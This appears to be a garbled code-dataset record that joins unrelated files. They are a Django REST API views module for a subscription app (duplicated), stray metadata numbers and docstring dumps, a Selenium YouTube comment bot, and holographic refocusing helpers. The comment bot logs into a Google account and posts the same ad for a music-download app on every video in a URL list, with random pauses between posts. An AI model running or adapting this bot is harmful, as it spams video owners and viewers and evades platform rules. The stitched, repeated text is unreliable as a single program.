""" config = models.Config.get_solo() self.check_object_permissions(self.request, config) return config class KMUserDetailView(generics.RetrieveUpdateAPIView): """ get: Endpoint for retrieving the details of a specific Know Me user. put: Endpoint for updating the details of a specific Know Me user. patch: Endpoint for partially updating the details of a specific Know Me user. """ permission_classes = (DRYPermissions,) queryset = models.KMUser.objects.all() serializer_class = serializers.KMUserDetailSerializer class KMUserListView(generics.ListAPIView): """ get: Endpoint for listing the Know Me users that the current user has access to. The Know Me user owned by the requesting user is guaranteed to be the first element returned. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserListSerializer def get_queryset(self): """ Get the list of Know Me users the requesting user has access to. Returns: A queryset containing the ``KMUser`` instances accessible to the requesting user. """ # User granted access through an accessor. Note that the owner # of the Know Me user being shared must have an active premium # subscription. filter_args = Q(km_user_accessor__is_accepted=True) filter_args &= Q(km_user_accessor__user_with_access=self.request.user) # If the premium requirement is enabled, the shared user must # have an active premium subscription. if settings.KNOW_ME_PREMIUM_ENABLED: filter_args &= Q( km_user_accessor__km_user__user__know_me_subscription__is_active=True # noqa ) # Requesting user is the user filter_args |= Q(user=self.request.user) query = models.KMUser.objects.filter(filter_args).distinct() # Allow us to sort the query with the requesting user's Know Me # user first. 
See conditional expression documentation: # https://docs.djangoproject.com/en/dev/ref/models/conditional-expressions/ query = query.annotate( owned_by_user=Case( When(user=self.request.user, then=Value(1)), default=Value(0), output_field=PositiveSmallIntegerField(), ) ) return query.order_by("-owned_by_user", "created_at") class LegacyUserDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete the specified legacy user. get: Retrieve the specified legacy user's information. patch: Partially update the specified legacy user's information. put: Update the specified legacy user's information. """ permission_classes = (DRYGlobalPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class LegacyUserListView(generics.ListCreateAPIView): """ get: Get a list of all legacy users. post: Add a new legacy user. """ pagination_class = pagination.PageNumberPagination permission_classes = (DRYPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class PendingAccessorListView(generics.ListAPIView): """ Endpoint for listing the accessors that the current user can accept. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the list of pending accessors for the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances that give access to the requesting user and are not yet accepted. """ return self.request.user.km_user_accessors.filter(is_accepted=False) class ReminderEmailSubscriberDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete a specific reminder email subscription. get: Retrieve a specific reminder email subscription's information. patch: Partially update a specific reminder email subscription's information. put: Update a specific reminder email subscription's information. 
""" permission_classes = (DRYPermissions,) queryset = models.ReminderEmailSubscriber.objects.all() serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_object(self): """ Returns: The email reminder subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404( models.ReminderEmailSubscriber, user=self.request.user ) class ReminderEmailSubscriberListView(generics.ListCreateAPIView): """ Endpoint for listing reminder email subscribers """ permission_classes = (DRYPermissions,) serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_queryset(self): """ Get the reminder email subscription for the current user. Returns: A queryset containing the ``ReminderEmailSubscriber`` instances belonging to the user whose PK was passed to the view. """ return models.ReminderEmailSubscriber.objects.filter( user=self.request.user ) def perform_create(self, serializer): """ Create a reminder email subscriber for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``ReminderEmailSubscriber`` instance. """ return serializer.save(user=self.request.user) class ReminderEmailUnsubscribeView(HttpRequest): """ Endpoint for unsubscribing to email reminders through email link. """ def unsubscribe(request, *args, **kwargs): uuid = kwargs["subscription_uuid"] email = kwargs["email"] msg = "<h1>Invalid Link</h1>" sub = models.ReminderEmailSubscriber.objects.filter( subscription_uuid=uuid ).first() if ( sub is not None and str(sub.user.primary_email).lower() == email.lower() ): sub.delete() msg = "<h1>Unsubscribed</h1>" return HttpResponse(msg, content_type="text/html", charset="utf-8") class SubscriptionDetailView(generics.RetrieveAPIView): """ get: Get an overview of the requesting user's Know Me premium subscription. 
""" permission_classes = (IsAuthenticated,) serializer_class = subscription_serializers.SubscriptionSerializer def get_object(self): """ Returns: The subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404(models.Subscription, user=self.request.user) class SubscriptionTransferView(generics.CreateAPIView): """ post: Transfer a Know Me premium subscription to another user. Requirements: * The authenticated user must have an active Know Me premium subscription. * The specified recipient email address must exist in the system and be verified. * The recipient must not have an active premium subscription. """ permission_classes = (permissions.HasPremium,) serializer_class = subscription_serializers.SubscriptionTransferSerializer
"""Views for the ``know_me`` module. """ import logging from django.conf import settings from django.db.models import Case, PositiveSmallIntegerField, Q, Value, When from django.http import HttpResponse, HttpRequest from django.shortcuts import get_object_or_404 from dry_rest_permissions.generics import DRYGlobalPermissions, DRYPermissions from rest_framework import generics, pagination, status from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from know_me import models, permissions, serializers from know_me.serializers import ( subscription_serializers, email_reminder_subscriber_serializers, ) from permission_utils.view_mixins import DocumentActionMixin logger = logging.getLogger(__name__) class AppleReceiptQueryView(generics.CreateAPIView): """ post: Determine if an Apple receipt is already in use. If a valid Apple receipt is passed to the endpoint, the response will contain an `is_used` key indicating if the receipt is in use. If it is in use, the `email` key of the response will contain the primary email address of the owner of the receipt. If the provided receipt is invalid, a 400 response will be returned. """ serializer_class = subscription_serializers.AppleReceiptQuerySerializer def create(self, *args, **kwargs): """ Override the response returned from the parent class' ``create`` method to have a 200 status code. """ response = super().create(*args, **kwargs) response.status_code = status.HTTP_200_OK return response class AppleSubscriptionView(generics.RetrieveDestroyAPIView): """ delete: Delete the Apple receipt associated with the requesting user's Know Me premium subscription. Deleting the receipt will also immediately deactivate the user's premium subscription. get: Retrieve the current user's Apple subscription. If the user does not have an Apple subscription, a 404 response is returned. put: Set the Apple subscription for the current user by providing the receipt from Apple for the purchase. 
""" permission_classes = (DRYPermissions,) serializer_class = subscription_serializers.AppleReceiptSerializer def get_object(self): """ Get the Apple subscription data instance that belongs to the requesting user. Returns: The ``AppleReceipt`` instance that belongs to the requesting user. """ return get_object_or_404( models.AppleReceipt, subscription__user=self.request.user ) def perform_destroy(self, instance): """ Delete the requesting user's Apple receipt and deactivate their premium subscription. Args: instance: The Apple receipt data to delete. """ subscription = instance.subscription subscription.is_active = False subscription.save() instance.delete() logger.info( "Deleted Apple receipt associated with subscription %d", subscription.pk, ) def put(self, request, *args, **kwargs): # If the user has an existing Apple subscription, update it try: instance = models.AppleReceipt.objects.get( subscription__user=self.request.user ) except models.AppleReceipt.DoesNotExist: instance = None # Validate the data provided to the serializer before we create # the base subscription (if necessary). serializer = self.get_serializer(instance, data=request.data) serializer.is_valid(raise_exception=True) subscription, _ = models.Subscription.objects.get_or_create( user=self.request.user, defaults={"is_active": False} ) serializer.save(subscription=subscription) return Response(serializer.data) class AccessorAcceptView(generics.GenericAPIView): """ post: Accept the accessor with the specified ID. Only the user granted access by the accessor may accept it. """ # We use the global permissions check because the normal check # assumes we're checking write permissions for a POST request. permission_classes = (DRYGlobalPermissions,) queryset = models.KMUserAccessor.objects.all() # We need a serializer class because dry-rest-permissions uses the # serializer to determine the model used for the view. 
serializer_class = serializers.KMUserAccessorAcceptSerializer def check_object_permissions(self, request, obj): """ Check permissions on the accessor being accessed. Only the user granted access by the accessor has permission to accept the accessor. Args: request: The request being made. obj: The ``KMUserAccessor`` instance being accepted. """ super().check_object_permissions(request, obj) if not obj.has_object_accept_permission(request): self.permission_denied(request) def post(self, request, *args, **kwargs): accessor = self.get_object() accessor.is_accepted = True accessor.save() return Response(status=status.HTTP_204_NO_CONTENT) class AcceptedAccessorListView(generics.ListAPIView): """ get: Retrieve the accessors granting the requesting user access to other users' accounts that have been accepted. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accepted by the requesting user. Returns: A queryset containing the accessors accepted by the requesting user. """ return self.request.user.km_user_accessors.filter(is_accepted=True) class AccessorDetailView( DocumentActionMixin, generics.RetrieveUpdateDestroyAPIView ): """ get: Endpoint for retrieving the details of a specific accessor. put: Endpoint for updating an accessor. patch: Endpoint for partially updating an accessor. delete: Endpoint for deleting a specific accessor. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accessible to the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the requesting user. 
""" query = Q(km_user__user=self.request.user) query |= Q(user_with_access=self.request.user) return models.KMUserAccessor.objects.filter(query) class AccessorListView(generics.ListCreateAPIView): """ get: Endpoint for listing the accessors that grant access to the current user's Know Me profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* post: Endpoint for creating a new accessor for the current user's profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* """ permission_classes = (DRYPermissions, permissions.HasPremium) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors for the user with the given PK. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the Know Me user whose PK was passed to the view. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return km_user.km_user_accessors.all() def perform_create(self, serializer): """ Create a new accessor for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``KMUserAccessor`` instance. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return serializer.save(km_user=km_user) class ConfigDetailView(generics.RetrieveUpdateAPIView): """ get: Retrieve the configuration for the Know Me app. patch: Partially update the configuration for Know Me. Only staff users may perform this action. put: Update the configuration for Know Me. Only staff users may perform this action. """ permission_classes = (DRYGlobalPermissions,) serializer_class = serializers.ConfigSerializer def get_object(self): """ Return the config instance singleton. 
""" config = models.Config.get_solo() self.check_object_permissions(self.request, config) return config class KMUserDetailView(generics.RetrieveUpdateAPIView): """ get: Endpoint for retrieving the details of a specific Know Me user. put: Endpoint for updating the details of a specific Know Me user. patch: Endpoint for partially updating the details of a specific Know Me user. """ permission_classes = (DRYPermissions,) queryset = models.KMUser.objects.all() serializer_class = serializers.KMUserDetailSerializer class KMUserListView(generics.ListAPIView): """ get: Endpoint for listing the Know Me users that the current user has access to. The Know Me user owned by the requesting user is guaranteed to be the first element returned. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserListSerializer def get_queryset(self): """ Get the list of Know Me users the requesting user has access to. Returns: A queryset containing the ``KMUser`` instances accessible to the requesting user. """ # User granted access through an accessor. Note that the owner # of the Know Me user being shared must have an active premium # subscription. filter_args = Q(km_user_accessor__is_accepted=True) filter_args &= Q(km_user_accessor__user_with_access=self.request.user) # If the premium requirement is enabled, the shared user must # have an active premium subscription. if settings.KNOW_ME_PREMIUM_ENABLED: filter_args &= Q( km_user_accessor__km_user__user__know_me_subscription__is_active=True # noqa ) # Requesting user is the user filter_args |= Q(user=self.request.user) query = models.KMUser.objects.filter(filter_args).distinct() # Allow us to sort the query with the requesting user's Know Me # user first. 
See conditional expression documentation: # https://docs.djangoproject.com/en/dev/ref/models/conditional-expressions/ query = query.annotate( owned_by_user=Case( When(user=self.request.user, then=Value(1)), default=Value(0), output_field=PositiveSmallIntegerField(), ) ) return query.order_by("-owned_by_user", "created_at") class LegacyUserDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete the specified legacy user. get: Retrieve the specified legacy user's information. patch: Partially update the specified legacy user's information. put: Update the specified legacy user's information. """ permission_classes = (DRYGlobalPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class LegacyUserListView(generics.ListCreateAPIView): """ get: Get a list of all legacy users. post: Add a new legacy user. """ pagination_class = pagination.PageNumberPagination permission_classes = (DRYPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class PendingAccessorListView(generics.ListAPIView): """ Endpoint for listing the accessors that the current user can accept. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the list of pending accessors for the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances that give access to the requesting user and are not yet accepted. """ return self.request.user.km_user_accessors.filter(is_accepted=False) class ReminderEmailSubscriberDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete a specific reminder email subscription. get: Retrieve a specific reminder email subscription's information. patch: Partially update a specific reminder email subscription's information. put: Update a specific reminder email subscription's information. 
""" permission_classes = (DRYPermissions,) queryset = models.ReminderEmailSubscriber.objects.all() serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_object(self): """ Returns: The email reminder subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404( models.ReminderEmailSubscriber, user=self.request.user ) class ReminderEmailSubscriberListView(generics.ListCreateAPIView): """ Endpoint for listing reminder email subscribers """ permission_classes = (DRYPermissions,) serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_queryset(self): """ Get the reminder email subscription for the current user. Returns: A queryset containing the ``ReminderEmailSubscriber`` instances belonging to the user whose PK was passed to the view. """ return models.ReminderEmailSubscriber.objects.filter( user=self.request.user ) def perform_create(self, serializer): """ Create a reminder email subscriber for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``ReminderEmailSubscriber`` instance. """ return serializer.save(user=self.request.user) class ReminderEmailUnsubscribeView(HttpRequest): """ Endpoint for unsubscribing to email reminders through email link. """ def unsubscribe(request, *args, **kwargs): uuid = kwargs["subscription_uuid"] email = kwargs["email"] msg = "<h1>Invalid Link</h1>" sub = models.ReminderEmailSubscriber.objects.filter( subscription_uuid=uuid ).first() if ( sub is not None and str(sub.user.primary_email).lower() == email.lower() ): sub.delete() msg = "<h1>Unsubscribed</h1>" return HttpResponse(msg, content_type="text/html", charset="utf-8") class SubscriptionDetailView(generics.RetrieveAPIView): """ get: Get an overview of the requesting user's Know Me premium subscription. 
""" permission_classes = (IsAuthenticated,) serializer_class = subscription_serializers.SubscriptionSerializer def get_object(self): """ Returns: The subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404(models.Subscription, user=self.request.user) class SubscriptionTransferView(generics.CreateAPIView): """ post: Transfer a Know Me premium subscription to another user. Requirements: * The authenticated user must have an active Know Me premium subscription. * The specified recipient email address must exist in the system and be verified. * The recipient must not have an active premium subscription. """ permission_classes = (permissions.HasPremium,) serializer_class = subscription_serializers.SubscriptionTransferSerializer
en
0.822414
Views for the ``know_me`` module. post: Determine if an Apple receipt is already in use. If a valid Apple receipt is passed to the endpoint, the response will contain an `is_used` key indicating if the receipt is in use. If it is in use, the `email` key of the response will contain the primary email address of the owner of the receipt. If the provided receipt is invalid, a 400 response will be returned. Override the response returned from the parent class' ``create`` method to have a 200 status code. delete: Delete the Apple receipt associated with the requesting user's Know Me premium subscription. Deleting the receipt will also immediately deactivate the user's premium subscription. get: Retrieve the current user's Apple subscription. If the user does not have an Apple subscription, a 404 response is returned. put: Set the Apple subscription for the current user by providing the receipt from Apple for the purchase. Get the Apple subscription data instance that belongs to the requesting user. Returns: The ``AppleReceipt`` instance that belongs to the requesting user. Delete the requesting user's Apple receipt and deactivate their premium subscription. Args: instance: The Apple receipt data to delete. # If the user has an existing Apple subscription, update it # Validate the data provided to the serializer before we create # the base subscription (if necessary). post: Accept the accessor with the specified ID. Only the user granted access by the accessor may accept it. # We use the global permissions check because the normal check # assumes we're checking write permissions for a POST request. # We need a serializer class because dry-rest-permissions uses the # serializer to determine the model used for the view. Check permissions on the accessor being accessed. Only the user granted access by the accessor has permission to accept the accessor. Args: request: The request being made. obj: The ``KMUserAccessor`` instance being accepted. 
get: Retrieve the accessors granting the requesting user access to other users' accounts that have been accepted. Get the accessors accepted by the requesting user. Returns: A queryset containing the accessors accepted by the requesting user. get: Endpoint for retrieving the details of a specific accessor. put: Endpoint for updating an accessor. patch: Endpoint for partially updating an accessor. delete: Endpoint for deleting a specific accessor. Get the accessors accessible to the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the requesting user. get: Endpoint for listing the accessors that grant access to the current user's Know Me profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* post: Endpoint for creating a new accessor for the current user's profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* Get the accessors for the user with the given PK. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the Know Me user whose PK was passed to the view. Create a new accessor for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``KMUserAccessor`` instance. get: Retrieve the configuration for the Know Me app. patch: Partially update the configuration for Know Me. Only staff users may perform this action. put: Update the configuration for Know Me. Only staff users may perform this action. Return the config instance singleton. get: Endpoint for retrieving the details of a specific Know Me user. put: Endpoint for updating the details of a specific Know Me user. patch: Endpoint for partially updating the details of a specific Know Me user. get: Endpoint for listing the Know Me users that the current user has access to. The Know Me user owned by the requesting user is guaranteed to be the first element returned. 
Get the list of Know Me users the requesting user has access to. Returns: A queryset containing the ``KMUser`` instances accessible to the requesting user. # User granted access through an accessor. Note that the owner # of the Know Me user being shared must have an active premium # subscription. # If the premium requirement is enabled, the shared user must # have an active premium subscription. # noqa # Requesting user is the user # Allow us to sort the query with the requesting user's Know Me # user first. See conditional expression documentation: # https://docs.djangoproject.com/en/dev/ref/models/conditional-expressions/ delete: Delete the specified legacy user. get: Retrieve the specified legacy user's information. patch: Partially update the specified legacy user's information. put: Update the specified legacy user's information. get: Get a list of all legacy users. post: Add a new legacy user. Endpoint for listing the accessors that the current user can accept. Get the list of pending accessors for the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances that give access to the requesting user and are not yet accepted. delete: Delete a specific reminder email subscription. get: Retrieve a specific reminder email subscription's information. patch: Partially update a specific reminder email subscription's information. put: Update a specific reminder email subscription's information. Returns: The email reminder subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. Endpoint for listing reminder email subscribers Get the reminder email subscription for the current user. Returns: A queryset containing the ``ReminderEmailSubscriber`` instances belonging to the user whose PK was passed to the view. Create a reminder email subscriber for the current user. Args: serializer: The serializer containing the received data. 
Returns: The newly created ``ReminderEmailSubscriber`` instance. Endpoint for unsubscribing to email reminders through email link. get: Get an overview of the requesting user's Know Me premium subscription. Returns: The subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. post: Transfer a Know Me premium subscription to another user. Requirements: * The authenticated user must have an active Know Me premium subscription. * The specified recipient email address must exist in the system and be verified. * The recipient must not have an active premium subscription.
2.203823
2
commentbot/commentbot.py
cmccvic/CBOnetwork
0
6629009
<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- # Python bot for comment a list of urls in YouTube import time import numpy as np from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.firefox.firefox_binary import FirefoxBinary def youtube_login(email, password): # Browser binary = FirefoxBinary('C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe') driver = webdriver.Firefox(firefox_binary=binary) driver.get( 'https://accounts.google.com/ServiceLogin?hl=tr&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26feature%3Dsign_in_button%26app%3Ddesktop%26action_handle_signin%3Dtrue%26next%3D%252F&uilel=3&passive=true&service=youtube#identifier') # find email, send data and submit EMAIL_FIELD = driver.find_element_by_id('identifierId') EMAIL_FIELD.click() EMAIL_FIELD.clear() EMAIL_FIELD.send_keys(email) EMAIL_FIELD.send_keys(Keys.ENTER) time.sleep(3) driver.find_element_by_class_name('CeoRYc').click() time.sleep(4) # find password, send data and submit PASSWD_FIELD = driver.find_element_by_name('password') PASSWD_FIELD.click() PASSWD_FIELD.clear() PASSWD_FIELD.send_keys(password) PASSWD_FIELD.send_keys(Keys.ENTER) time.sleep(3) time.sleep(3) return driver def comment_page(driver, urls, comment): # Check if there still urls if len(urls) == 0: print 'Youtube Comment Bot: Finished!' return [] # Pop a URL from the array url = urls.pop() # Visite the page driver.get(url) driver.implicitly_wait(1) # Is video avaliable (deleted,private) ? if not check_exists_by_xpath(driver, '//*[@id="movie_player"]'): return comment_page(driver, urls, random_comment()) # Scroll, wait for load comment box driver.execute_script("window.scrollTo(0, 500);") # Comments are disabled? 
if check_exists_by_xpath(driver, '//*[@id="comments-disabled-message"]/div/span'): return comment_page(driver, urls, random_comment()) # Lets wait for comment box WebDriverWait(driver, 15).until(EC.presence_of_element_located((By.ID, "comment-section-renderer"))) # Activate box for comments driver.find_element_by_class_name('comment-simplebox-renderer-collapsed-content').click() # driver.find_element_by_xpath("//div[@id='comment-section-renderer']/div/div[2]/div").click() # Send comment and post driver.implicitly_wait(5) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(_convert(comment)) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(Keys.ENTER + Keys.ENTER) # Is post ready to be clicked? comment-simplebox-submit driver.find_element_by_class_name('comment-simplebox-submit').click() # Lets wait a bit r = np.random.randint(2, 5) time.sleep(r) # Recursive return comment_page(driver, urls, random_comment()) def _convert(param): if isinstance(param, str): return param.decode('utf-8') else: return param def random_comment(): messages = [ 'Müzik Caddesi Uyguluması müzik indirme ve dinleme programı telefonuza şarkı keyfi yaşatır. Google Play\'den indirebilir veya https://play.google.com/store/apps/details?id=com.muzikcaddesi.muzikcaddesi' ] r = np.random.randint(0, len(messages)) return messages[r] def check_exists_by_xpath(driver, xpath): try: driver.find_element_by_xpath(xpath) except NoSuchElementException: return False return True if __name__ == '__main__': # Credentials email = '' password = '' # List of Urls # urls = [ # 'https://www.youtube.com/watch?v=qbrvM61MUAY', # ] urls = [''] # You can add in a file and import from there inp = open("urls.txt", "r") for line in inp.readlines(): yeni_url = line.split() for current_word in yeni_url: urls.append(current_word) # Login in youtube driver = youtube_login(email, password) # Random comment comment_page(driver, urls, random_comment())
#!/usr/bin/env python # -*- coding: utf-8 -*- # Python bot for comment a list of urls in YouTube import time import numpy as np from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.firefox.firefox_binary import FirefoxBinary def youtube_login(email, password): # Browser binary = FirefoxBinary('C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe') driver = webdriver.Firefox(firefox_binary=binary) driver.get( 'https://accounts.google.com/ServiceLogin?hl=tr&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26feature%3Dsign_in_button%26app%3Ddesktop%26action_handle_signin%3Dtrue%26next%3D%252F&uilel=3&passive=true&service=youtube#identifier') # find email, send data and submit EMAIL_FIELD = driver.find_element_by_id('identifierId') EMAIL_FIELD.click() EMAIL_FIELD.clear() EMAIL_FIELD.send_keys(email) EMAIL_FIELD.send_keys(Keys.ENTER) time.sleep(3) driver.find_element_by_class_name('CeoRYc').click() time.sleep(4) # find password, send data and submit PASSWD_FIELD = driver.find_element_by_name('password') PASSWD_FIELD.click() PASSWD_FIELD.clear() PASSWD_FIELD.send_keys(password) PASSWD_FIELD.send_keys(Keys.ENTER) time.sleep(3) time.sleep(3) return driver def comment_page(driver, urls, comment): # Check if there still urls if len(urls) == 0: print 'Youtube Comment Bot: Finished!' return [] # Pop a URL from the array url = urls.pop() # Visite the page driver.get(url) driver.implicitly_wait(1) # Is video avaliable (deleted,private) ? if not check_exists_by_xpath(driver, '//*[@id="movie_player"]'): return comment_page(driver, urls, random_comment()) # Scroll, wait for load comment box driver.execute_script("window.scrollTo(0, 500);") # Comments are disabled? 
if check_exists_by_xpath(driver, '//*[@id="comments-disabled-message"]/div/span'): return comment_page(driver, urls, random_comment()) # Lets wait for comment box WebDriverWait(driver, 15).until(EC.presence_of_element_located((By.ID, "comment-section-renderer"))) # Activate box for comments driver.find_element_by_class_name('comment-simplebox-renderer-collapsed-content').click() # driver.find_element_by_xpath("//div[@id='comment-section-renderer']/div/div[2]/div").click() # Send comment and post driver.implicitly_wait(5) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(_convert(comment)) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(Keys.ENTER + Keys.ENTER) # Is post ready to be clicked? comment-simplebox-submit driver.find_element_by_class_name('comment-simplebox-submit').click() # Lets wait a bit r = np.random.randint(2, 5) time.sleep(r) # Recursive return comment_page(driver, urls, random_comment()) def _convert(param): if isinstance(param, str): return param.decode('utf-8') else: return param def random_comment(): messages = [ 'Müzik Caddesi Uyguluması müzik indirme ve dinleme programı telefonuza şarkı keyfi yaşatır. Google Play\'den indirebilir veya https://play.google.com/store/apps/details?id=com.muzikcaddesi.muzikcaddesi' ] r = np.random.randint(0, len(messages)) return messages[r] def check_exists_by_xpath(driver, xpath): try: driver.find_element_by_xpath(xpath) except NoSuchElementException: return False return True if __name__ == '__main__': # Credentials email = '' password = '' # List of Urls # urls = [ # 'https://www.youtube.com/watch?v=qbrvM61MUAY', # ] urls = [''] # You can add in a file and import from there inp = open("urls.txt", "r") for line in inp.readlines(): yeni_url = line.split() for current_word in yeni_url: urls.append(current_word) # Login in youtube driver = youtube_login(email, password) # Random comment comment_page(driver, urls, random_comment())
en
0.67824
#!/usr/bin/env python # -*- coding: utf-8 -*- # Python bot for comment a list of urls in YouTube # Browser #identifier') # find email, send data and submit # find password, send data and submit # Check if there still urls # Pop a URL from the array # Visite the page # Is video avaliable (deleted,private) ? # Scroll, wait for load comment box # Comments are disabled? # Lets wait for comment box # Activate box for comments # driver.find_element_by_xpath("//div[@id='comment-section-renderer']/div/div[2]/div").click() # Send comment and post # Is post ready to be clicked? comment-simplebox-submit # Lets wait a bit # Recursive # Credentials # List of Urls # urls = [ # 'https://www.youtube.com/watch?v=qbrvM61MUAY', # ] # You can add in a file and import from there # Login in youtube # Random comment
2.920219
3
Digital Holographic Refocusing/myfunctions.py
monakhova/Fourier-Optics-Demos
8
6629010
<filename>Digital Holographic Refocusing/myfunctions.py # Functions def rgb2gray(rgb): import numpy as np return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) def contrast(g_in): import numpy as np I_max = np.max(np.abs(g_in)**2) I_min = np.min(np.abs(g_in)**2) C = (I_max - I_min)/(I_max+I_min) return(C) def propagate(ein, lmda, z, ps): import numpy as np # Digitally refocuses a complex field a given distance, z. # (ref pg 67,<NAME>, Introduction to Fourier Optics) #inputs: # ein - complex field at input plane # lmda - wavelength of light [um] # z - vector of propagation distances [um] # ps - pixel size [um] [m,n]=ein.shape; M = m; N= n; eout = np.zeros([m,n,z.shape[0]])*1j; f_metric = np.zeros([z.shape[0]])*1j; Hout = np.zeros([m,n,z.shape[0]])*1j; # Spatial Sampling [x,y]=np.meshgrid(np.arange(-n/2, n/2), np.arange(-m/2, m/2)); fx=(x/(ps*M)); #frequency space width [1/m] fy=(y/(ps*N)); #frequency space height [1/m] fx2fy2 = fx**2 + fy**2; # Padding value ein_pad = ein; E0fft = np.fft.fftshift(np.fft.fft2(ein_pad)); mask = 1; for z_ind in range(0,z.shape[0]): H = np.exp(-1j*np.pi*lmda*z[z_ind]*fx2fy2); Eout_pad=np.fft.ifft2(np.fft.ifftshift(E0fft*H*mask)); f_metric[z_ind] = np.linalg.norm(np.real(H)*2*np.real(H)*E0fft,1) eout[:,:,z_ind]=Eout_pad Hout[:,:,z_ind]=H.copy() return(eout, Hout, f_metric) def interactive_slider(image, title): # Makes an interactive slider from ipywidgets import widgets import matplotlib.pyplot as plt # For making figures def slice_through_images(image): def slice_step(i_step): fig, axes = plt.subplots(figsize=(10, 5)) axes.imshow(image[:,:,i_step], cmap='gray') plt.title(title) plt.colorbar plt.show() return slice_step stepper = slice_through_images(image) widgets.interact(stepper, i_step=(0, image.shape[2]-1)) def imshowAnim(myimage, zs, niter, imsize): # Function to generate animated video import matplotlib.pyplot as plt # For making figures import numpy as np # Standard NumPy library from matplotlib import animation, rc # Used for inline 
animations from IPython.display import HTML # Used for inline animations fig = plt.figure(); fig=plt.figure(figsize=(imsize, imsize), dpi= 100, facecolor='w', edgecolor='k'); a = (myimage[:,:,0]); im=plt.imshow(np.abs(myimage[:,:,0]), extent=[0, 1, 0, 1], vmin=np.min(myimage[:,:,0]), vmax=np.max(myimage[:,:,0])); ttl = plt.title(('Image # %s'%(1))); plt.axis('off'); plt.close(); def init(): im.set_data(np.abs(myimage[:,:,0])); return [im] # animation function. This is called sequentially def animate(i): a = np.abs(myimage[:,:,i]); im.set_array(a); im.set_cmap('gray') ttl.set_text(('Defocus %s (um)'%(zs[i]))); # Change text return [im, ttl] # call the animator. blit=True means only re-draw the parts that have changed. anim = animation.FuncAnimation(fig, animate, init_func=init, frames=niter, interval=200); return(HTML(anim.to_html5_video()));
